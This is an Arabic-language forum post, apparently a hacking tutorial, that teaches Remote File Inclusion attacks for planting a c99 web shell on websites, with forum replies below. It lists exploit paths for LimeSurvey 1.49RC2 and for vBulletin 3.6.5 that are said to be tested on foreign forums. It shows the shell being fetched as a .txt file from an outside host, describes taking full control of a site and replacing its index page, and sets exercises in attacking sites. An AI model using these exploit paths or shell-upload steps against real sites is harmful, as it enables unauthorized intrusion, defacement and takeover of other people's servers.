تعال يلي حاب معرفت ثغرات File Include +وربط الشل بهذه الثغره + رابط شل جاهز

بسم الله الرحمن الرحيم
منتدى القرارة
السلام عليكم ورحمة الله وبركاته

اليوم ياأخوان راح نشرح لكم ثغرة فايل انكلود وانا والله رحت دورة لكم على أحسن وأفضل موضوع << بش أكثب لشرح هذه الثغره وأتمنى أنكم تركزو لأني شفت كثير من الناس يسأل كيف اربط شل ونحب ألرفع شل كل هاد راح تتعلمها بالفيديو وراح تتعلم والشرح العادي كله متوفر على حسب مزاجك هنا وأي سؤال أبشر انا حاضر أي واحد عنده سؤال راح اجوبكم خلونا نتوكل على الله

قبل كل شيء هاد رابط شل جاهز

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وأحب أقولك أنوا اذا مافهمت هاد الكلام كله فيه كتاب تقدر تحمله تحت شرح ثاني لها بطريقة غير وأيضا هناك شرح بالفيديو

كيفية رفع الشيل عبر ثغرات File Include

في عدة طرق انا راح أشرحها اليوم طريقة

ام الطرق الثانية راح تكون في درس منفصل بإذن الله

الطريقة اللي راح اشرحها درك وهي عن طريق [ الثغرات ]

يعني نرفع شيل من خلال ثغره

طبعاً الثغرات أنواع كثيره ولازم الواحد يتعمق فيها لكن الدورة بتاعتى سأشرح فيها كل الثغرات انتظرو بش اشرح الثغرات كلها

راح اشرح اسهل نوع من انواع الثغرات ويأدي الغرض اللي نحب اشرح ..

وهو ثغرات الـ File Include ( الفايل انكلود ) أو بالعربي ادراج ملف

يمكننا البحث عن الثغرات في مواقع الحماية وانا انصح بهذي المواقع

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

لأن البحث عن الثغرات فيها بسيط وهي من اقوى المواقع في نفس الوقت

طبعاً انا راح اشرح كيف يتم استغلال ثغرات الفايل انكلود

نختار ثغرة من الميل ورم مثلاً

هذي الثغره

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

تعالوا نطلع عليها

نشوف هده الأشياء

فيها اسم المكتشف ووو .. لكن شوفوا الخانات

كود:

## Script site : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
## Script name : LimeSurvey (PHPSurveyor)
## Version : 1.49RC2

Script site = موقع مبرمج السكريبت
Script name = اسم السكربت المصاب
Version = الاصدار المصاب

حسنا واحد يقول لنا وش هو السكريبت ؟

السكريبت هو برنامج مبرمج بلغة الـ php مثل سكربت المنتدى وسكربت البطاقات .. الخ

الأن الثغره اللي عرضتها فوق يقول لنا في سكريبت اسمه LimeSurvey فيه ثغرة فايل انكلود

يعني نقدر ندرج من خلالها شيل .. او بالأصح اي موقع مركب فيه لسكريبت نقدر نرفع فيه شيل

تعالوا نكمل نشوف الثغره

نشوف الخانه

كود:

## Type : RFI(Remote File Include)

Type = النوع

مثل ماهو ظاهر لنا ريموت فايل انكلود ( يعني ادراج ملف عن بعد )

واختصارها RFI وهي أول حرف من كلمة كلمة

المهم عرفنا انها فايل انكلود اتركوا كل الكلام لأنه ما يفيدنا

اهم شي في الثغره نعرفه

هو

1- اسم السكريبت المصاب . ( عرفنا في ثغرتنا انه اسم السكريبت المصاب هو LimeSurvey )
2- الاصدار المصاب . ( عرفنا في ثغرتنا فوق ان الاصدار المصاب هو 1.49RC2 )
3- نوع الثغره . ( عرفنا فوق ان الثغرات اللي حنا نشرح عليها فايل انكلود أي ثغرات ثانية استغلالها مختلف )
4- الاستغلال .

الأن عرفنا كل الأنواع أين الاستغلال

تعالوا نرجع لصفحة الثغره هنا

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

ابحثوا عن عبارة Exploit وتعني ( الاستغلال )

انا لقيتها

كود:

## Exploit :

نلاحظ ان فيه اكثر من استغلال

وهذي هي الاستغلالات

كود:

## /admin/classes/pear/OLE/PPS/File.php?homedir=[shell]

## /admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]

## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]

## /admin/classes/pear/OLE/PPS.php?homedir=[shell]

## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]

## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]

## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]

## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]

## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]

ناخذ استغلال من الاستغلالات

/admin/classes/pear/OLE/PPS/File.php?homedir=[shell]

تعالوا نحلل الاستغلال هذا
admin = مجلد
classes = مجلد آخر
pear = مجلد ثاني آخر
OLE = مجلد ثالث آخر
PPS = مجلد رابع آخر .. يا ليل البعارين
File.php = الملف المصاب

تعالوا نترجم الاستغلال

يقول لك الاستغلال ادخل مجلد admin داخله راح تلقى مجلد classes ادخله وراح تلقى داخله مجلد ثاني pear ادخله وداخله راح تلقى مجلد ثالث OLE

ادخله وداخله راح تلقى مجلد PPS داخل هالمجلد راح تلقى ملف File.php وهو الملف المصاب

طيب ترجمنا الاستغلال ترى ما نحتاج الترجمه بش تفهمون لا أكثر ولا أقل

لو جينا وقلنا هذا موقع

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

سكريبت LimeSurvey اصداره 1.49RC2 راكب عليه هنا

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وحنا عندنا ثغرة نرفع الشيل تعالوا نستغلها

بما ان السكريبت داخل مجلد ls في الموقع

راح يكون تطبيقنا هكذا

كود:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
هذا هو الاستغلال
الحين كل اللي علينا نستبدل عبارة
[shell]
برابط شيل مرفوع على اي موقع بامتداد txt
لو انا مثلاً رافع شيل على موقع
بامتداد txt
كمثال شوف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
هذا شيل c99 مرفوع على موقع
لاحظوا ان امتداده هو
txt
وليس
php
وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب
وليس قراءة الملف في الموقع اللي رافعين عليه الشيل
الاستغلال يكون هكذا

كود:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
لاتنسوا عند الادراج تضعون علامة الاستفاهم في نهاية الاستغلال
تعالوا نترجم الأمر اللي درناه
لو درك فتحنا الصفحة هذي

كود:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
بيعرض لنا الشيل اللي حنا رافعينه على موقع ثاني ولكن بينعرض على موقع القرارة جدعان
تعالوا نحلل الاستغلال ثاني
حنا الحين من خلال ثغرة في سكريبت مرفوع على موقع القرارة جدعان

أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

داخل منتدى القرارة ان درت منتدى القرارة لشرح فقط
وقراءتها على سيرفر

يعني انه بيسحب أكواد الشيل ويشغله على منتدى القرارة

وهكذا بيعرض لنا الشيل على منتدى القرارة وحنا في الحقيقه ما رفعناه على الموقع كل اللي درناه عرض على الموقع

ونقدر نتحكم بالموقع كامل من خلال هده الطريقه .. وكذلك لو كان في مجلد مصرح 777 تقدر ترفع فيه الشيل على المواقع او صفحتك او اي شي

درك نجي لدرسنا السابق وهو الصلاحيات الحين لو عرضنا الشيل على منتدى القرارة

وطلعت لنا الصلاحية = hack15 هذا يعني ان صلاحيتنا يوزر عالموقع يعني نقدر نتحكم في مجلد مندى القرارة

يعني ما يحتاج تصريح 777 تقدر ترفع اندكسك بالصفحة الرئيسية وتلعب بالموقع كامل لعب لأن صلاحيتك حالياً هي يوزر يعني مالك الموقع

وهكذا نكون انتهينا من شرح استغلال ثغرات الفايل انكلود والحمد لله

قبل ما اطلع من الدرس حاب اعطيكم هدية بسيطه
===============================================
جاني واحد من الشباب وعطاني هالثغره
ثغرتين فايل انكلود تساعدك لرفع شل على نسخة ال 3.6.5 vb
الثغره مجربه علي اكثر من منتدي اجنبي

كود:

vb/includes/functions_cron.php?nextitem=shell

vb/includes/functions.php?classfile=shell

vb/includes/functions_forumdisplay.php?specialtemplates= shell
مثال على الاستغلال :-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] shell

لا تنسى استبدال shell برابط شيل txt ولاتنسى علامة الاستفاهم واحلى اختراق
==================================================
تعالوا ما زال مكملناش .. هع مافي راحة

اسئلة اليوووم ^_^

حنا شرحنا فوق الثغره وانا شرحت استغلال واحد من الاستغلالات

الحين راع اعطي أمثلة مواقع ( وهمية )

هذي مواقع نفترض انها مركبة السكريبت والسكريبت فيها موجود بمجلد ss

هذي هي

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

نحب ترجعون تشوفون الاستغلالات فوق وتستغلونها على هذي المواقع

وكل استغلال مختلف عن الثاني يعني لا يجي واحد يطبق لي نفس الاستغلال غلى المواقع كلها

ويكون الاستغلال كامل مع الشيل وكل شي ..

مثال على استغلال كامل

كود:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

فيه ناس متحبش الشرح هكدا بارد يحبوا يتابعون الدرس وهو على فيديو مكانش مشكله تفضل هاد درس بالفيديو

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

موضوع مميز

هدا اول شرح لختراق المواقع في هدا المنتدى اعرف انه صعب فقد كلفني سنتين لكي اتعلم لدى ان اتردد في انزال اشروحات

احسنت اخي هاك 47 لكن هل يمكن اختراق منتدانا بهده الطريقة

نعم ادا كانت فيه ثغرة ولكن لا عليك سأفحصه وسأسد كل الثغرات

تحيا الهاك 47

انا استعملة في شرحي ثغرة فيل انكلود موقع منتدى القرارة لشرح فقط
ارجو المعدرة

كيفااااااه

يعني لو تابعة جيدا تجد في شرحي لثغرة فايل انكلود الخطيرة استعملة موقع منتدى القرارة لأشرح لكم فقط

لالا نورمال مدامك انت هنا منخافش الى المنتدى وربي يعاونك

عند الحق اخي فيجيتا

عدد المساهمات : 2 تاريخ التسجيل : 05/03/2011

مشكوووور والله على الروعة
لكن الدرس قديم شوية لكنه مفيد للمبتدئين